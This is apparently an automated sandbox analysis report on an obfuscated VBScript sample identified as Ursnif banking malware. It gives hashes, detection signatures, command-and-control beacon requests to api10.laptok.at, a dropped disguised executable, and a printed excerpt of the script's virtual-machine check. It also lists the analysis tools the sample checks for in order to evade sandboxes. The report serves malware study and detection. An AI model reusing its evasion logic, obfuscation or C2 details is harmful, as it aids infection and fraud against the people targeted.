Analysis Report YvGLRQ2lBoNg.vbs

Overview

General Information

Sample Name: YvGLRQ2lBoNg.vbs
Analysis ID: 284796
MD5: 0671e735481a55031081895bf0f57760
SHA1: 11788132e8b10e6370530d68d2d562737ef1dae0
SHA256: f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Avira: detection malicious, Label: TR/Kryptik.fklcr
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ogress.psd Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\ogress.psd ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: YvGLRQ2lBoNg.vbs Virustotal: Detection: 21%

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SELECTELRU
Source: global traffic HTTP traffic detected: GET /api1/d_2FkQMQPNS1PtreuLmDr0c/isKQ3en2ep/WdaePBnxWvNr4O7Zx/fe5GpcKXEs0Z/nWv1haJIdxX/KPQImnsWZc6Bts/3T1sv6KdCgBkk8kTcY4Tw/vLBIAR6SvcfKkftr/v3qWzzjdQvHhSwJ/vN5Dy_2FrTM09tl_2F/E9H6fSft8/LNlFBPxAbjE4J0c6TJOC/anV9v94dZW1QTs_2Fbn/bfOfyFPP6TfVwktOgPJiQQ/RMTYA97pNPcLL/nGwKPMp2/dEpg95nX_2B2Qt_0A_0DKLH/tTw8xa4uQv/h6OXh5Fmz3Z3zI7T2/MnlbUyKlzKYN/4KNu2_2B_2B/GIckXkWWxkB/utBojx5s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/1D7z5XkAX/_2FbQrtYcD1kFDfXonyT/Jj2mYzkdYtc4R7X6fxc/9urYr1WZcWa6ZWnQBAZ43f/xval831E1IBwG/n6pzC3ar/eKGANQIthekvo9zg_2Fb94x/iPFw6um9yA/exbRhIIlmYTmBTpxl/jJEsgsP3dBx9/zs5yDfHduFs/ySeUPKocHhrMVB/Q8EDMO_2B3zJSk5QBFGvT/Yy3iBRuEUbqp4Kxn/CqGIdwKcFdmihQj/fosd0P6SSgwFfVNavf/RyCG8rcLK/w_0A_0D7W0vvsSLrshwz/e9K8aNiOBT0pOorA5hH/f7RmqSwXFZJni1LXH4cpYp/tjerjQMglan/92z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81a0cb84,0x01d68993</date><accdate>0x81a0cb84,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x81a32dd6,0x01d68993</date><accdate>0x81a32dd6,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x81a5901e,0x01d68993</date><accdate>0x81a5901e,0x01d68993</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: msapplication.xml.17.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.17.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.17.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.17.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.17.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.17.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.17.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.17.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.499146589.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499050996.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499116737.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.498994540.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499095914.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499022832.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499133343.0000000005718000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.499076887.0000000005718000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\ogress.psd 034F2720D2408955AE412FD3657F6D1E50677CFCC8B5D030F3BC1F9D195AD21F
Java / VBScript file with very long strings (likely obfuscated code)
Source: YvGLRQ2lBoNg.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/17@2/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\YvGLRQ2lBoNg.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: YvGLRQ2lBoNg.vbs Virustotal: Detection: 21%
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5524 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5928 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
Source: YvGLRQ2lBoNg.vbs Static file information: File size 1452344 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\meet\well\Brought\story\During\2\claim\84\Could\6\Element\Motion\3\Shore\market.pdb source: ogress.psd.1.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface:
WScript.ScriptName, cStr(555551152)) > 0 And astronomy146 = 0) Then
Exit Function
' gargle triphammer fusillade Emile goober height Colombia317 Cameroon infantile macaque Virgil15 larynx Blair Vassar citron Marjory319 ticket Horowitz doubt pounce genius prolate expurgate trichloroethane hap114 gurgle spear Tommie stereo contraption clank710 counterfeit boutique teenage attrition stratify stannic polysemous volcanism candle stenographer649 noontime metallography, 8485223 chrome night clapboard squalid wacky. 1611065 iambic Belgrade697 peaceful kickback formulaic versus tuff598 xerox899 gaur registrable quagmire. distort767 bodybuilding channel diagrammed parolee900 Balzac. acme. Kirkpatrick stardom virgin payroll688, 230300 Corbett646 Isaiah tectonic Sharon787 abolition planet nightshade Bini touchdown condescension effusion728 societal proverbial822 raven erosion twig gadgetry. cavalier townsmen Arlen solitary exclusive Togo side960 crore gardenia skyhook proctor
End If
Set waggle651 = GetObject("winmgmts:\\.\root\cimv2")
Set adjust193lItems = waggle651.ExecQuery("Select * from Win32_Processor", , ((46 + 34.0) + (-((88 + (-60.0)) + 4.0))))
For Each glycine543 In adjust193lItems
If glycine543.NumberOfCores < (((1786 - 1758.0) + (40 + (-30.0))) - 35.0) Then
ISsAHR = True
REM soup extent populism curvilinear Ethiopia290 adposition lineman glycerinate77 Hillcrest Vance scapula metazoa console48 athletic herringbone raillery jure adorn fiance Middlesex miniature58 spiritual McHugh813 Bengal repelling pyrotechnic bivalve215 Cottrell Sandburg seder swart murk comprehend serology Tunis souvenir362 hoodlum quartile pike switchboard clairvoyant arabesque580 continual bindle collard616 chassis rainy fifteenth shorthand
End If
REM prosody indices. 2301989 booky875 Swede hardcopy lessee devotion507, 9597409 Congo542 commandant493 Syria. bakery692. tori bushy560 highball nugget401 bedfast Copenhagen down commensurate dot paragon574 surname spree clairvoyant664 Oneida Bose636 CDC panicky. 851619 begetting. 5002303 bifocal945 Bushnell134 prick827 planeload113 equatorial187. keelson slapstick merchant511 nor contrabass leggy cluster Stewart rheostat Essen471 spheric re lobby henceforth merrymake spangle Leland contain Standish crutch607 blowup smuggle Wittgenstein650 fugal, 745304 Thessaly. 9793611 conqueror851 Casanova770 transferral spear282 indecomposable Macedonia ecosystem poison pathogenic, skipjack idyllic980 solitude moose Palomar Knapp un shrimp archetype yarn Multics radian Howe291 Cowan Caldwell, converge aching isocline Bavaria variable otiose977 voyage paper, autopilot332
Next
If ISsAHR Then
AYdtfwwD
End If
' minesweeper548 violin603, glove scowl mignon40 Markov lovebird, thirst godmother Mukden Cranford. gunmen Wilma genealogy ski tokamak947 abetting ecosystem715 apocalyptic, sora tyrannicide serf resist Eduardo Christensen Catherwood disrupt mercurial seaboard, 6929809 rein933 fin extent210 polytope. qua modern10 . indelicate lycopodium explicate hesi

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ogress.psd

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\yvglrq2lbong.vbs
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psd
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1420 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: ogress.psd.1.dr Binary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: ogress.psd.1.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\locate.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000001.00000003.397237946.000002009D578000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000001.00000003.397072434.000002009D57E000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Remote Access Functionality:

Yara detected Ursnif